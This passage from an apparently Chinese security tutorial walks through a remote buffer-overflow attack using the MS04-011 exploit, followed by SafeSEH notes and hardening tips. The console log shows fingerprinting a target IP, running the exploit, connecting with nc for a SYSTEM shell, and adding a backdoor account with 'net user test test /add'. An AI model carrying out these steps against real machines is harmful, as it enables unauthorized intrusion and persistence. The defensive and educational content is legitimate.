我們來看一下以前比較精典的一個溢出實例ms04011溢出：
Microsoft Windows XP [版本 5.1.2600]
(C) 版權所有 1985-2001 Microsoft Corp.
C:\windows\system32\cd\
C:\>
C:\>getos 2**.159.31.96   （判斷操作系統(tǒng)）
----------------------------
THCsmbgetOS v0.1 - gets gro
by Johnny Cyberpunk (
----------------------------
[*] Connecting Port 139....
[*] Sending session request.
[*] Sending negotiation requ
[*] Sending setup account re
[*] Successful....
Remote OS:
----------
WORKGROUP
Windows 2000 LAN Manager
Windows 5.1
C:\>
C:\>ms04011 1 2**.159.31.96 (溢出格式)
shellcode size 404
Ret value = 1727
C:\>
C:\>nc 2**.159.31.96 1234  (nc進行連接)
Microsoft Windows XP [版本 5.1.2600]
(C) 版權所有 1985-2001 Microsoft Corp.
D:\WINDOWS\system32> (得到目標機shell)
D:\WINDOWS\system32>net user test  test /add
net user test test /add
命令成功完成。  (建立用戶)
上面只是簡單演示了一下溢出過程，上例是正向溢出，只是直接溢出后用nc進行連接，還可以反向溢出，反向溢出一般用來突破防火墻，先用nc在本機監(jiān)聽一個端口，等待反向溢出的服務器連接過來從而得到一個system權限的shell。對于溢出還有很多，如iis、mso4045、ms04049、ms05039、ms05051、ms06061等還有一些精典的應用程序遠程溢出，如未打sp3的mssql遠程溢出可以直接得到系統(tǒng)權限。還有imail服務也一樣可以通過遠程溢出獲得系統(tǒng)權限。還有很多病毒如沖擊波、震蕩波等病毒都是利用的rpc和lsass溢出漏洞，在感染一臺機器后又不斷的以此機器為節(jié)點掃描網(wǎng)絡中的其它存在漏洞的機器進行溢出植入病毒程序，這樣不斷的繁殖下去。
不過在windiws2003下溢出就無用武之地了，因為在2003的保護機制里面還有一個技術是可控的SEH處理函數(shù)指針，2003中結構化異常處理例程注冊后，它的函數(shù)指針會保存在模塊中的一個叫Load Configuration Directory的地址列表中，如果函數(shù)返回時系統(tǒng)發(fā)現(xiàn)堆棧中的Cookie發(fā)生了改變，視為溢出，系統(tǒng)就會查看當前線程相關的SEH中是否有相應的處 理函數(shù)指針，有的話，系統(tǒng)將該指針與已經(jīng)注冊過函數(shù)的地址列表進行對照，如果沒有發(fā)現(xiàn)匹配的，而且處理函數(shù)指針在堆棧中，異常處理函數(shù)就不運行。如果該處 理函數(shù)指針位于已加載的各個DLL模塊地址范圍只外，或堆中，處理函數(shù)會被執(zhí)行，這種可控制的異常處理技術就會使傳統(tǒng)的覆蓋SEH指針的方法失敗。雖然可以用已經(jīng)加載模塊以外的地址來覆蓋SHE但在遠程溢出中仍顯得無力。
我們再來看看本地溢出，本地溢出主要用來進行權限提升，前面的serv-u的本地溢出已經(jīng)注入中講解了，我們現(xiàn)在再來看一下本地的一個特權提升漏洞，如圖：

通過執(zhí)行本地溢出直接從user用戶提升到系統(tǒng)權限。
對溢出攻擊的安全防范：
關閉139端口，停掉icp/ip netbios服務。
在本地連接的屬性窗口中tcp/ip協(xié)議中的高級選項里“禁用tcp/ip上的netbios(s)”因為很多溢出都是利用的這個通道。
安裝防火墻是必要的。
打上重要漏洞的補丁（如沖擊波補丁、震蕩波補丁），并開啟系統(tǒng)的自動更新功能。
服務器使用windows2003系統(tǒng)。